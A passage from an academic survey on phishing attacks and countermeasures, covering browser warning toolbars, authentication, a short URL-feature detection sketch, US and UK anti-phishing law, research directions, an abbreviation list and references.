4. Warning tools or security indicators that are embedded into the web browser to inform the user after detecting the attack. For example, eBay Toolbar and Account Guard ( eBay Toolbar and Account Guard, 2009 ) protect customers' eBay and PayPal passwords respectively by alerting users about the authenticity of the sites into which they try to type their passwords. Numerous anti-phishing solutions rely mainly on warnings that are displayed on the security toolbar. In addition, some toolbars, such as McAfee and Netscape, block suspicious sites to warn about them. A study presented in ( Robichaux and Ganger, 2006 ) conducted a test to evaluate the performance of eight anti-phishing solutions, including Microsoft Internet Explorer 7, EarthLink, eBay, McAfee, GeoTrust, Google using Firefox, Netscape, and Netcraft. These are warning and blocking tools that allow legitimate sites while blocking and warning about known phishing sites. The study also found that Internet Explorer and the Netcraft Toolbar showed more effective results than the other anti-phishing tools. However, security toolbars still fail to prevent people from falling victim to phishing, even though these toolbars improve internet security in general ( Abu-Nimeh and Nair, 2008 ).

5. Authentication ( Moore and Clayton, 2007 ) and authorization ( Hutchings et al., 2016 ) techniques that provide protection from phishing by verifying the identity of the legitimate person. This prevents phishers from accessing a protected resource and conducting their attack. There are three types of authentication. Single-factor authentication requires only a username and password. Two-factor authentication requires additional information besides the username and password, such as a One-Time Password (OTP) that is sent to the user's email address or phone. Multi-factor authentication uses more than one form of identity (i.e., a combination of something you know, something you are, and something you have). Some widely used methods in the authorization process are API authorization and OAuth 2.0, which allow the previously generated API to access the system.
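
The URL cues listed under the first approach above (an @ character, an IP address in place of a domain name, a prefix/suffix, and an "https" token inside the domain part) can be turned into simple rules. The sketch below is a hedged illustration, not the rule set of Jeeva and Rajsingh (2016): the function names, the reading of "prefix/suffix" as a hyphen in the host name, and the equal weighting of the cues are all assumptions.

```python
import ipaddress
from urllib.parse import urlsplit


def url_features(url):
    """Extract four rule-based cues from a URL."""
    host = urlsplit(url).hostname or ""
    try:
        ipaddress.ip_address(host)   # succeeds only for literal IP hosts
        host_is_ip = True
    except ValueError:
        host_is_ip = False
    return {
        "has_at_symbol": "@" in url,
        "host_is_ip": host_is_ip,
        # Assumption: a hyphen marks an added prefix or suffix.
        "hyphen_in_host": "-" in host,
        "https_token_in_host": "https" in host,
    }


def suspicious_score(url):
    """Count how many cues fire (equal weights, an arbitrary choice)."""
    return sum(url_features(url).values())


for u in [
    "https://www.bank.example/",
    "http://user@192.0.2.10/login",
    "http://https-secure-bank.example/",
]:
    print(u, suspicious_score(u))
```

A machine-learning classifier would typically consume such features as inputs rather than summing them; the sum is used here only to keep the example short.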

However, the progressive increase in phishing attacks shows that previous methods do not provide the required protection against most existing phishing attacks, because no single solution or technology can prevent all phishing attacks. An effective anti-phishing solution should be based on a combination of technical solutions and increased user awareness ( Boddy, 2018 ).

Solutions Provided by Legislations as a Deterrent Control

A cyber-attack is considered a crime when an individual intentionally accesses personal information on a computer without permission, even if the individual does not steal information or damage the system ( Mince-Didier, 2020 ). The sole objective of almost all phishing attacks is to obtain sensitive information with the intent of committing identity theft, and there are currently no federal laws in the United States aimed specifically at phishing; phishing crimes are therefore usually covered under identity theft laws. Phishing is considered a crime even if the victim does not actually fall for the phishing scam; the punishments depend on circumstances and usually include jail, fines, restitution, and probation ( Nathan, 2020 ). Phishing attacks cause different levels of damage to the victims, such as financial and reputational losses. Therefore, law enforcement authorities should track down these attacks in order to punish the criminals, as with real-world crimes. As a complement to technical solutions and human education, the support provided by applicable laws and regulations can play a vital role as a deterrent control. Increasingly, authorities around the world have created regulations in order to mitigate the increase of phishing attacks and their impact. The first anti-phishing laws were enacted by the United States, where the FTC added phishing attacks to the computer crime list in January 2004. A year later, the “Anti-Phishing Act” was introduced in the US Congress in March 2005 ( Mohammad et al., 2014 ). Meanwhile, in the United Kingdom, legislation is gradually being adapted to address phishing and other forms of cyber-crime. In 2006, the United Kingdom government amended the Computer Misuse Act 1990, intending to bring it up to date with developments in computer crime and to increase penalties for breaches, with penalties of up to 10 years ( eBay Toolbar and Account Guard, 2009 ; PhishLabs, 2019 ).
In this regard, a student in the United Kingdom who made hundreds of thousands of pounds blackmailing pornography website users was jailed in April 2019 for six years and five months. According to the National Crime Agency (NCA), this attacker was the most prolific cybercriminal to be sentenced in the United Kingdom ( Casciani, 2019 ). Moreover, organizations bear part of the responsibility for protecting personal information, as stated in the Data Protection Act 2018 and the EU General Data Protection Regulation (GDPR). Phishing websites can also be taken down through the actions of law enforcement agencies. In the United Kingdom, websites can be taken down by the National Crime Agency (NCA), which includes the National Cyber Crime Unit, and by the City of London Police, which includes the Police Intellectual Property Crime Unit (PIPCU) and the National Fraud Intelligence Bureau (NFIB) ( Hutchings et al., 2016 ).

However, anti-phishing law enforcement still faces numerous challenges and limitations. Firstly, after perpetrating the phishing attack, the phisher can vanish into cyberspace, making it difficult to prove the offender's guilt and to recover the damages caused by the attack, which limits the effectiveness of law enforcement. Secondly, even if the attacker's identity is disclosed, in the case of international attackers it will be difficult to bring the attacker to justice because of the differences in countries' legislation (e.g., exchange treaties). Also, the attack can be conducted within a short time span; for instance, the average lifetime of a phishing website is about 54 h, as stated by the APWG. Therefore, there must be a quick response from the government and the authorities to detect and control the attack and identify its perpetrators ( Ollmann, 2004 ).

Phishing attacks remain one of the major threats to individuals and organizations to date. As highlighted in the article, this is mainly driven by human involvement in the phishing cycle. Phishers often exploit human vulnerabilities in addition to favorable technological conditions (i.e., technical vulnerabilities). It has been identified that age, gender, internet addiction, user stress, and many other attributes affect people's susceptibility to phishing. In addition to traditional phishing channels (e.g., email and web), new phishing mediums such as voice and SMS phishing are on the increase. Furthermore, social media-based phishing has increased in parallel with the growth of social media. Concomitantly, phishing has developed beyond obtaining sensitive information and financial crimes to cyber terrorism, hacktivism, damaging reputations, espionage, and nation-state attacks. Research has been conducted to identify the motivations, techniques, and countermeasures for these new crimes; however, there is no single solution to the phishing problem due to the heterogeneous nature of the attack vector. This article has investigated problems presented by phishing and proposed a new anatomy, which describes the complete life cycle of phishing attacks. This anatomy provides a wider outlook on phishing attacks and provides an accurate definition covering end-to-end exclusion and realization of the attack.

Although human education is the most effective defense against phishing, it is difficult to remove the threat completely due to the sophistication of the attacks and their social engineering elements. Although continual security awareness training is the key to avoiding phishing attacks and reducing their impact, developing efficient anti-phishing techniques that prevent users from being exposed to the attack is an essential step in mitigating these attacks. To this end, this article discussed the importance of developing anti-phishing techniques that detect/block the attack. Furthermore, techniques that determine the source of the attack could provide a stronger anti-phishing solution, as discussed in this article.

Furthermore, this article identified the importance of law enforcement as a deterrent mechanism. Further investigations and research are necessary as discussed below.

1. Further research is necessary to study and investigate susceptibility to phishing among users, which would assist in designing stronger and self-learning anti-phishing security systems.

2. Research on social media-based phishing, voice phishing, and SMS phishing is sparse, and these emerging threats are predicted to increase significantly over the coming years.

3. Laws and legislation that apply to phishing are still in their infancy; in fact, there are no specific phishing laws in many countries. Most phishing attacks are covered under traditional criminal laws such as those on identity theft and computer crime. Therefore, drafting specific laws for phishing is an important step in mitigating these attacks at a time when these crimes are becoming more common.

4. Determining the source of the attack before the end of the phishing lifecycle and enforcing legislation against the offender could help restrict phishing attacks drastically and would benefit from further research.

It can be observed that the mediums used for phishing attacks have changed from traditional emails to social media-based phishing. There is a clear lag between sophisticated phishing attacks and existing countermeasures. The emerging countermeasures should be multidimensional to tackle both human and technical elements of the attack. This article provides valuable information about current phishing attacks and countermeasures whilst the proposed anatomy provides a clear taxonomy to understand the complete life cycle of phishing.

Author Contributions

This work is by our PhD student ZA supported by her Supervisory Team.

Conflict of Interest

The authors declare that the research was conducted in the absence of any commercial or financial relationships that could be construed as a potential conflict of interest.

AOL America Online

APWG Anti-Phishing Working Group

ARPANET Advanced Research Projects Agency Network

ARP Address Resolution Protocol

BHO Browser Helper Object

BEC business email compromise

COVID-19 Coronavirus disease 2019

CSS cascading style sheets

DDoS distributed denial of service

DNS Domain Name System

DoS Denial of Service

FTC Federal Trade Commission

FL Fuzzy Logic

HTTPS Hypertext Transfer Protocol Secure

IE Internet Explorer

ICT Information and Communications Technology

IM Instant Message

IT Information Technology

IP Internet Protocol

MITM Man-in-the-Middle

NCA National Crime Agency

NFIB National Fraud Intelligence Bureau

PIPCU Police Intellectual Property Crime Unit

OS Operating Systems

PBX Private Branch Exchange

SMishing Text Message Phishing

SPF Sender Policy Framework

SMTP Simple Mail Transfer Protocol

SMS Short Message Service

Soshing Social Media Phishing

SQL structured query language

URL Uniform Resource Locator

UK United Kingdom

US United States

USB Universal Serial Bus

US-CERT United States Computer Emergency Readiness Team.

Vishing Voice Phishing

VNC Virtual Network Computing

VoIP Voice over Internet Protocol

XSS Cross-Site Scripting

1 Proofpoint is “a leading cybersecurity company that protects organizations’ greatest assets and biggest risks: their people. With an integrated suite of cloud-based solutions” ( Proofpoint, 2019b ).

2 APWG is “the international coalition unifying the global response to cybercrime across industry, government and law-enforcement sectors and NGO communities” ( APWG, 2020 ).

3 Caller ID is “a telephone facility that displays a caller’s phone number on the recipient's phone device before the call is answered” ( Techpedia, 2021 ).

4 An IPPBX is “a telephone switching system within an enterprise that switches calls between VoIP users on local lines while allowing all users to share a certain number of external phone lines” ( Margaret, 2008 ).

Abad, C. (2005). The economy of phishing: a survey of the operations of the phishing market. First Monday 10, 1–11. doi:10.5210/fm.v10i9.1272

Abu-Nimeh, S., and Nair, S. (2008). “Bypassing security toolbars and phishing filters via DNS poisoning,” in IEEE GLOBECOM 2008–2008 IEEE global telecommunications conference, New Orleans, LA, November 30–December 2, 2008 (IEEE), 1–6. doi:10.1109/GLOCOM.2008.ECP.386

Aburrous, M., Hossain, M. A., Thabatah, F., and Dahal, K. (2008). “Intelligent phishing website detection system using fuzzy techniques,” in 2008 3rd international conference on information and communication technologies: from theory to applications (New York, NY: IEEE), 1–6. doi:10.1109/ICTTA.2008.4530019

Afroz, S., and Greenstadt, R. (2009). “Phishzoo: an automated web phishing detection approach based on profiling and fuzzy matching,” in Proceeding 5th IEEE international conference semantic computing (ICSC) , 1–11.

Alsharnouby, M., Alaca, F., and Chiasson, S. (2015). Why phishing still works: user strategies for combating phishing attacks. Int. J. Human-Computer Stud. 82, 69–82. doi:10.1016/j.ijhcs.2015.05.005

APWG (2018). Phishing activity trends report 3rd quarter 2018 . US. 1–11.

APWG (2020). APWG phishing attack trends reports. Anti-Phishing Working Group, Inc. Available at: https://apwg.org/trendsreports/ (Accessed September 20, 2020).

Arachchilage, N. A. G., and Love, S. (2014). Security awareness of computer users: a phishing threat avoidance perspective. Comput. Hum. Behav. 38, 304–312. doi:10.1016/j.chb.2014.05.046

Arnsten, B. A., Mazure, C. M., and April, R. S. (2012). Everyday stress can shut down the brain’s chief command center. Sci. Am. 306, 1–6. Available at: https://www.scientificamerican.com/article/this-is-your-brain-in-meltdown/ (Accessed October 15, 2019).

Bailey, J. L., Mitchell, R. B., and Jensen, B. K. (2008). “Analysis of student vulnerabilities to phishing,” in 14th Americas conference on information systems, AMCIS 2008, 75–84. Available at: https://aisel.aisnet.org/amcis2008/271.

Barracuda (2020). Business email compromise (BEC). Available at: https://www.barracuda.com/glossary/business-email-compromise (Accessed November 15, 2020).

Belcic, I. (2020). Rootkits defined: what they do, how they work, and how to remove them. Available at: https://www.avast.com/c-rootkit (Accessed November 7, 2020).

Bergholz, A., De Beer, J., Glahn, S., Moens, M.-F., Paaß, G., and Strobel, S. (2010). New filtering approaches for phishing email. JCS 18, 7–35. doi:10.3233/JCS-2010-0371

Bin, S., Qiaoyan, W., and Xiaoying, L. (2010). “A DNS based anti-phishing approach,” in 2010 second international conference on networks security, wireless communications and trusted computing, Wuhan, China, April 24–25, 2010 (IEEE), 262–265. doi:10.1109/NSWCTC.2010.196

Boddy, M. (2018). Phishing 2.0: the new evolution in cybercrime. Comput. Fraud Secur. 2018, 8–10. doi:10.1016/S1361-3723(18)30108-8

Casciani, D. (2019). Zain Qaiser: student jailed for blackmailing porn users worldwide. Available at: https://www.bbc.co.uk/news/uk-47800378 (Accessed April 9, 2019).

Chanti, S., and Chithralekha, T. (2020). Classification of anti-phishing solutions. SN Comput. Sci. 1, 11. doi:10.1007/s42979-019-0011-2

Checkpoint (2020). Check point research’s Q1 2020 brand phishing report. Available at: https://www.checkpoint.com/press/2020/apple-is-most-imitated-brand-for-phishing-attempts-check-point-researchs-q1-2020-brand-phishing-report/ (Accessed August 6, 2020).

Cisco (2018). What is the difference: viruses, worms, Trojans, and bots? Available at: https://www.cisco.com/c/en/us/about/security-center/virus-differences.html (Accessed January 20, 2020).

CISA (2018). What is phishing. Available at: https://www.us-cert.gov/report-phishing (Accessed June 10, 2019).

Cormack, G. V., Smucker, M. D., and Clarke, C. L. A. (2011). Efficient and effective spam filtering and re-ranking for large web datasets. Inf. Retrieval 14, 441–465. doi:10.1007/s10791-011-9162-z

Corrata (2018). The rising threat of social media phishing attacks. Available at: https://corrata.com/the-rising-threat-of-social-media-phishing-attacks/ (Accessed October 29, 2019).

Crane, C. (2019). The dirty dozen: the 12 most costly phishing attack examples. Available at: https://www.thesslstore.com/blog/the-dirty-dozen-the-12-most-costly-phishing-attack-examples/ (Accessed August 2, 2020).

CSI Onsite (2012). Phishing. Available at: http://csionsite.com/2012/phishing/ (Accessed May 8, 2019).

Cui, Q., Jourdan, G.-V., Bochmann, G. V., Couturier, R., and Onut, I.-V. (2017). Tracking phishing attacks over time. Proc. 26th Int. Conf. World Wide Web - WWW ’17 , Republic and Canton of Geneva, Switzerland: International World Wide Web Conferences Steering Committee . 667–676. doi:10.1145/3038912.3052654

CVEdetails (2005). Vulnerability in microsoft internet explorer. Available at: https://www.cvedetails.com/cve/CVE-2005-4089/ (Accessed August 20, 2019).

Cybint Cyber Solutions (2018). 13 alarming cyber security facts and stats. Available at: https://www.cybintsolutions.com/cyber-security-facts-stats/ (Accessed July 20, 2019).

Deshmukh, M., and raddha Popat, S. (2017). Different techniques for detection of phishing attack. Int. J. Eng. Sci. Comput. 7, 10201–10204. Available at: http://ijesc.org/ .

Dhamija, R., Tygar, J. D., and Hearst, M. (2006). “Why phishing works,” in Proceedings of the SIGCHI conference on human factors in computing systems - CHI ’06 , Montréal Québec, Canada , (New York, NY: ACM Press ), 581. doi:10.1145/1124772.1124861

Diaz, A., Sherman, A. T., and Joshi, A. (2020). Phishing in an academic community: a study of user susceptibility and behavior. Cryptologia 44, 53–67. doi:10.1080/01611194.2019.1623343

Dodge, R. C., Carver, C., and Ferguson, A. J. (2007). Phishing for user security awareness. Comput. Security 26, 73–80. doi:10.1016/j.cose.2006.10.009

eBay Toolbar and Account Guard (2009). Available at: https://download.cnet.com/eBay-Toolbar/3000-12512_4-10153544.html (Accessed August 7, 2020).

EDUCBA (2017). Hackers vs crackers: easy to understand exclusive difference. Available at: https://www.educba.com/hackers-vs-crackers/ (Accessed July 17, 2019).

Evers, J. (2006). Security expert: user education is pointless. Available at: https://www.cnet.com/news/security-expert-user-education-is-pointless/ (Accessed June 25, 2019).

F5Networks (2018). Panda malware broadens targets to cryptocurrency exchanges and social media. Available at: https://www.f5.com/labs/articles/threat-intelligence/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media (Accessed April 23, 2019).

Fette, I., Sadeh, N., and Tomasic, A. (2007). “Learning to detect phishing emails,” in Proceedings of the 16th international conference on world wide web - WWW ’07 , Banff Alberta, Canada , (New York, NY: ACM Press) , 649–656. doi:10.1145/1242572.1242660

Financial Fraud Action UK (2017). Fraud the facts 2017: the definitive overview of payment industry fraud. London. Available at: https://www.financialfraudaction.org.uk/fraudfacts17/assets/fraud_the_facts.pdf .

Fraud Watch International (2019). Phishing attack trends for 2019. Available at: https://fraudwatchinternational.com/phishing/phishing-attack-trends-for-2019/ (Accessed October 29, 2019).

FTC (2018). Netflix scam email. Available at: https://www.ftc.gov/tips-advice/business-center/small-businesses/cybersecurity/phishing (Accessed May 8, 2019).

Furnell, S. (2007). An assessment of website password practices. Comput. Secur. 26, 445–451. doi:10.1016/j.cose.2007.09.001

Getsafeonline (2017). Caught on the net. Available at: https://www.getsafeonline.org/news/caught-on-the-net/ (Accessed August 1, 2020).

GOV.UK (2020). Cyber security breaches survey 2020. Available at: https://www.gov.uk/government/publications/cyber-security-breaches-survey-2020/cyber-security-breaches-survey-2020 (Accessed August 6, 2020).

Gupta, P., Srinivasan, B., Balasubramaniyan, V., and Ahamad, M. (2015). “Phoneypot: data-driven understanding of telephony threats,” in Proceedings 2015 network and distributed system security symposium , (Reston, VA: Internet Society ), 8–11. doi:10.14722/ndss.2015.23176

Hadlington, L. (2017). Human factors in cybersecurity; examining the link between internet addiction, impulsivity, attitudes towards cybersecurity, and risky cybersecurity behaviours. Heliyon 3, e00346-18. doi:10.1016/j.heliyon.2017.e00346

Herley, C., and Florêncio, D. (2008). “A profitless endeavor,” in New security paradigms workshop (NSPW ’08) , New Hampshire, United States , October 25–28, 2021 , 1–12. doi:10.1145/1595676.1595686

Hewage, C. (2020). Coronavirus pandemic has unleashed a wave of cyber attacks – here’s how to protect yourself. Conversat . Available at: https://theconversation.com/coronavirus-pandemic-has-unleashed-a-wave-of-cyber-attacks-heres-how-to-protect-yourself-135057 (Accessed November 16, 2020).

Hong, J. (2012). The state of phishing attacks. Commun. ACM 55, 74–81. doi:10.1145/2063176.2063197

Huber, M., Kowalski, S., Nohlberg, M., and Tjoa, S. (2009). “Towards automating social engineering using social networking sites,” in 2009 international conference on computational science and engineering , Vancouver, BC , August 29–31, 2009 ( IEEE ), 117–124. doi:10.1109/CSE.2009.205

Hutchings, A., Clayton, R., and Anderson, R. (2016). “Taking down websites to prevent crime,” in 2016 APWG symposium on electronic crime research (eCrime) ( IEEE ), 1–10. doi:10.1109/ECRIME.2016.7487947

Iuga, C., Nurse, J. R. C., and Erola, A. (2016). Baiting the hook: factors impacting susceptibility to phishing attacks. Hum. Cent. Comput. Inf. Sci. 6, 8. doi:10.1186/s13673-016-0065-2

Jagatic, T. N., Johnson, N. A., Jakobsson, M., and Menczer, F. (2007). Social phishing. Commun. ACM 50, 94–100. doi:10.1145/1290958.1290968

Jakobsson, M., and Myers, S. (2006). Phishing and countermeasures: understanding the increasing problems of electronic identity theft . New Jersey: John Wiley and Sons .

Jakobsson, M., Tsow, A., Shah, A., Blevis, E., and Lim, Y. K. (2007). “What instills trust? A qualitative study of phishing,” in Lecture notes in computer science (including subseries lecture notes in artificial intelligence and lecture notes in bioinformatics) , (Berlin, Heidelberg: Springer ), 356–361. doi:10.1007/978-3-540-77366-5_32

Jeeva, S. C., and Rajsingh, E. B. (2016). Intelligent phishing url detection using association rule mining. Hum. Cent. Comput. Inf. Sci. 6, 10. doi:10.1186/s13673-016-0064-3

Johnson, A. (2016). Almost 600 accounts breached in “celebgate” nude photo hack, FBI says. Available at: http://www.cnbc.com/id/102747765 (Accessed February 17, 2020).

Kayne, R. (2019). What are script kiddies? Wisegeek. Available at: https://www.wisegeek.com/what-are-script-kiddies.htm (Accessed February 19, 2020).

Keck, C. (2018). FTC warns of sketchy Netflix phishing scam asking for payment details. Available at: https://gizmodo.com/ftc-warns-of-sketchy-netflix-phishing-scam-asking-for-p-1831372416 (Accessed April 23, 2019).

Keepnet LABS (2018). Statistical analysis of 126,000 phishing simulations carried out in 128 companies around the world. USA, France. Available at: www.keepnetlabs.com .

Keinan, G. (1987). Decision making under stress: scanning of alternatives under controllable and uncontrollable threats. J. Personal. Soc. Psychol. 52, 639–644. doi:10.1037/0022-3514.52.3.639

Khonji, M., Iraqi, Y., and Jones, A. (2013). Phishing detection: a literature survey. IEEE Commun. Surv. Tutorials 15, 2091–2121. doi:10.1109/SURV.2013.032213.00009

Kirda, E., and Kruegel, C. (2005). Protecting users against phishing attacks with AntiPhish. Proc. - Int. Comput. Softw. Appl. Conf. 1, 517–524. doi:10.1109/COMPSAC.2005.126

Krawchenko, K. (2016). The phishing email that hacked the account of John Podesta. CBSNEWS Available at: https://www.cbsnews.com/news/the-phishing-email-that-hacked-the-account-of-john-podesta/ (Accessed April 13, 2019).

Kaspersky (2020). Spam and phishing in Q1 2020. Available at: https://securelist.com/spam-and-phishing-in-q1-2020/97091/ (Accessed July 27, 2020).

Kumaraguru, P., Sheng, S., Acquisti, A., Cranor, L. F., and Hong, J. (2010). Teaching Johnny not to fall for phish. ACM Trans. Internet Technol. 10, 1–31. doi:10.1145/1754393.1754396

Latto, N. (2020). What is adware and how can you prevent it? Avast. Available at: https://www.avast.com/c-adware (Accessed May 8, 2020).

Le, D., Fu, X., and Hogrefe, D. (2006). A review of mobility support paradigms for the internet. IEEE Commun. Surv. Tutorials 8, 38–51. doi:10.1109/COMST.2006.323441

Lehman, T. J., and Vajpayee, S. (2011). “We’ve looked at clouds from both sides now,” in 2011 annual SRII global conference , San Jose, CA , March 20–April 2, 2011 ( IEEE ), 342–348. doi:10.1109/SRII.2011.46

Leyden, J. (2001). Virus toolkits are s’kiddie menace. Regist . Available at: https://www.theregister.co.uk/2001/02/21/virus_toolkits_are_skiddie_menace/ (Accessed June 15, 2019).

Lin, J., Sadeh, N., Amini, S., Lindqvist, J., Hong, J. I., and Zhang, J. (2012). “Expectation and purpose,” in Proceedings of the 2012 ACM conference on ubiquitous computing - UbiComp ’12 (New York, New York, USA: ACM Press ), 1625. doi:10.1145/2370216.2370290

Lininger, R., and Vines, D. R. (2005). Phishing: cutting the identity theft line. Print book . Indiana: Wiley Publishing, Inc .

Ma, J., Saul, L. K., Savage, S., and Voelker, G. M. (2009). “Identifying suspicious URLs.” in Proceedings of the 26th annual international conference on machine learning - ICML ’09 (New York, NY: ACM Press ), 1–8. doi:10.1145/1553374.1553462

Marforio, C., Masti, R. J., Soriente, C., Kostiainen, K., and Capkun, S. (2015). Personalized security indicators to detect application phishing attacks in mobile platforms. Available at: http://arxiv.org/abs/1502.06824 .

Margaret, R. I. P. (2008). PBX (private branch exchange). Available at: https://searchunifiedcommunications.techtarget.com/definition/IP-PBX (Accessed June 19, 2019).

Maurer, M.-E., and Herzner, D. (2012). Using visual website similarity for phishing detection and reporting. 1625–1630. doi:10.1145/2212776.2223683

Medvet, E., Kirda, E., and Kruegel, C. (2008). “Visual-similarity-based phishing detection,” in Proceedings of the 4th international conference on Security and privacy in communication networks - SecureComm ’08 (New York, NY: ACM Press ), 1. doi:10.1145/1460877.1460905

Merwe, A. v. d., Marianne, L., and Marek, D. (2005). “Characteristics and responsibilities involved in a Phishing attack,” in WISICT ’05: proceedings of the 4th international symposium on information and communication technologies . Trinity College Dublin , 249–254.

Microsoft (2020). Exploiting a crisis: how cybercriminals behaved during the outbreak. Available at: https://www.microsoft.com/security/blog/2020/06/16/exploiting-a-crisis-how-cybercriminals-behaved-during-the-outbreak/ (Accessed August 1, 2020).

Mince-Didier, A. (2020). Hacking a computer or computer network. Available at: https://www.criminaldefenselawyer.com/resources/hacking-computer.html (Accessed August 7, 2020).

Miyamoto, D., Hazeyama, H., and Kadobayashi, Y. (2009). “An evaluation of machine learning-based methods for detection of phishing sites,” in international conference on neural information processing ICONIP 2008: advances in neuro-information processing lecture notes in computer science . Editors M. Köppen, N. Kasabov, and G. Coghill (Berlin, Heidelberg: Springer Berlin Heidelberg ), 539–546. doi:10.1007/978-3-642-02490-0_66

Mohammad, R. M., Thabtah, F., and McCluskey, L. (2014). Predicting phishing websites based on self-structuring neural network. Neural Comput. Applic 25, 443–458. doi:10.1007/s00521-013-1490-z

Moore, T., and Clayton, R. (2007). “Examining the impact of website take-down on phishing,” in Proceedings of the anti-phishing working groups 2nd annual eCrime researchers summit on - eCrime ’07 (New York, NY: ACM Press ), 1–13. doi:10.1145/1299015.1299016

Morgan, S. (2019). 2019 official annual cybercrime report. USA, UK, Canada. Available at: https://www.herjavecgroup.com/wp-content/uploads/2018/12/CV-HG-2019-Official-Annual-Cybercrime-Report.pdf .

Nathan, G. (2020). What is phishing? + laws, charges & statute of limitations. Available at: https://www.federalcharges.com/phishing-laws-charges/ (Accessed August 7, 2020).

Okin, S. (2009). From script kiddies to organised cybercrime. Available at: https://comsecglobal.com/from-script-kiddies-to-organised-cybercrime-things-are-getting-nasty-out-there/ (Accessed August 12, 2019).

Ollmann, G. (2004). The phishing guide understanding & preventing phishing attacks abstract. USA. Available at: http://www.ngsconsulting.com .

Ong, S. (2014). Avast survey shows men more susceptible to mobile malware. Available at: https://www.mirekusoft.com/avast-survey-shows-men-more-susceptible-to-mobile-malware/ (Accessed November 5, 2020).

Ovelgönne, M., Dumitraş, T., Prakash, B. A., Subrahmanian, V. S., and Wang, B. (2017). Understanding the relationship between human behavior and susceptibility to cyber attacks. ACM Trans. Intell. Syst. Technol. 8, 1–25. doi:10.1080/00207284.1985.11491413

Parmar, B. (2012). Protecting against spear-phishing. Computer Fraud Security , 2012, 8–11. doi:10.1016/S1361-3723(12)70007-6

Phish Labs (2019). 2019 phishing trends and intelligence report the growing social engineering threat. Available at: https://info.phishlabs.com/hubfs/2019 PTI Report/2019 Phishing Trends and Intelligence Report.pdf .

PhishMe (2016). Q1 2016 malware review. Available at: WWW.PHISHME.COM .

PhishMe (2017). Human phishing defense enterprise phishing resiliency and defense report 2017 analysis of susceptibility, resiliency and defense against simulated and real phishing attacks. Available at: https://cofense.com/wp-content/uploads/2017/11/Enterprise-Phishing-Resiliency-and-Defense-Report-2017.pdf .

PhishTank (2006). What is phishing. Available at: http://www.phishtank.com/what_is_phishing.php?view=website&annotated=true (Accessed June 19, 2019).

Pompon, A. R., Walkowski, D., and Boddy, S. (2018). Phishing and Fraud Report attacks peak during the holidays. US .

Proofpoint (2019a). State of the phish 2019 report. Sport Mark. Q. 14, 4. doi:10.1038/sj.jp.7211019

Proofpoint (2019b). What is Proofpoint. Available at: https://www.proofpoint.com/us/company/about (Accessed September 25, 2019).

Proofpoint (2020). 2020 state of the phish. Available at: https://www.proofpoint.com/sites/default/files/gtd-pfpt-us-tr-state-of-the-phish-2020.pdf .

Raggo, M. (2016). Anatomy of a social media attack. Available at: https://www.darkreading.com/analytics/anatomy-of-a-social-media-attack/a/d-id/1326680 (Accessed March 14, 2019).

Ramanathan, V., and Wechsler, H. (2012). PhishGILLNET-phishing detection methodology using probabilistic latent semantic analysis, AdaBoost, and co-training. EURASIP J. Info. Secur. 2012, 1–22. doi:10.1186/1687-417X-2012-1

Ramzan, Z. (2010). “Phishing attacks and countermeasures,” in Handbook of Information and communication security (Berlin, Heidelberg: Springer Berlin Heidelberg ), 433–448. doi:10.1007/978-3-642-04117-4_23

Ramzan, Z., and Wuest, C. (2007). “Phishing Attacks: analyzing trends in 2006,” in Fourth conference on email and anti-Spam (Mountain View, California, United States).

Rhett, J. (2019). Don’t fall for this new Google translate phishing attack. Available at: https://www.gizmodo.co.uk/2019/02/dont-fall-for-this-new-google-translate-phishing-attack/ (Accessed April 23, 2019). doi:10.5040/9781350073272

RISKIQ (2020). Investigate | COVID-19 cybercrime weekly update. Available at: https://www.riskiq.com/blog/analyst/covid19-cybercrime-update/ (Accessed August 1, 2020).

Robichaux, P., and Ganger, D. L. (2006). Gone phishing: evaluating anti-phishing tools for windows. Available at: http://www.3sharp.com/projects/antiphishing/gonephishing.pdf .

Rouse, M. (2013). Phishing definition. Available at: https://searchsecurity.techtarget.com/definition/phishing (Accessed April 10, 2019).

Salem, O., Hossain, A., and Kamala, M. (2010). “Awareness program and AI based tool to reduce risk of phishing attacks,” in 2010 10th IEEE international conference on computer and information technology (IEEE) , Bradford, United Kingdom , June 29–July 1, 2010 ( IEEE ), 1418–1423. doi:10.1109/CIT.2010.254

Scaife, N., Carter, H., Traynor, P., and Butler, K. R. B. (2016). “Crypto lock (and drop it): stopping ransomware attacks on user data,” in 2016 IEEE 36th international conference on distributed computing systems (ICDCS) ( IEEE ), 303–312. doi:10.1109/ICDCS.2016.46

Sheng, S., Magnien, B., Kumaraguru, P., Acquisti, A., Cranor, L. F., Hong, J., et al. (2007). “Anti-Phishing Phil: the design and evaluation of a game that teaches people not to fall for phish,” in Proceedings of the 3rd symposium on usable privacy and security - SOUPS ’07 (New York, NY: ACM Press ), 88–99. doi:10.1145/1280680.1280692

Symantec (2019). Internet security threat report volume 24|February 2019 . USA.

Techopedia (2021). Caller ID. Available at: https://www.techopedia.com/definition/24222/caller-id (Accessed June 19, 2019).

VadeSecure (2021). Phishers favorites 2019. Available at: https://www.vadesecure.com/en/ (Accessed October 29, 2019).

Vishwanath, A. (2005). “Spear phishing: the tip of the spear used by cyber terrorists,” in deconstruction machines (United States: University of Minnesota Press ), 469–484. doi:10.4018/978-1-5225-0156-5.ch023

Wang, X., Zhang, R., Yang, X., Jiang, X., and Wijesekera, D. (2008). “Voice pharming attack and the trust of VoIP,” in Proceedings of the 4th international conference on security and privacy in communication networks, SecureComm’08 , 1–11. doi:10.1145/1460877.1460908

Wenyin, L., Huang, G., Xiaoyue, L., Min, Z., and Deng, X. (2005). “Detection of phishing webpages based on visual similarity,” in 14th international world wide web conference, WWW2005 , Chiba, Japan , May 10–14, 2005 , 1060–1061. doi:10.1145/1062745.1062868

Whitman, M. E., and Mattord, H. J. (2012). Principles of information security. Course Technol. 1–617. doi:10.1016/B978-0-12-381972-7.00002-6

Williams, E. J., Hinds, J., and Joinson, A. N. (2018). Exploring susceptibility to phishing in the workplace. Int. J. Human-Computer Stud. 120, 1–13. doi:10.1016/j.ijhcs.2018.06.004

wombatsecurity.com (2018). Wombat security user risk report. USA. Available at: https://info.wombatsecurity.com/hubfs/WombatProofpoint-UserRiskSurveyReport2018_US.pdf .

Workman, M. (2008). Wisecrackers: a theory-grounded investigation of phishing and pretext social engineering threats to information security. J. Am. Soc. Inf. Sci. 59 (4), 662–674. doi:10.1002/asi.20779

Yeboah-Boateng, E. O., and Amanor, P. M. (2014). Phishing , SMiShing & vishing: an assessment of threats against mobile devices. J. Emerg. Trends Comput. Inf. Sci. 5 (4), 297–307.

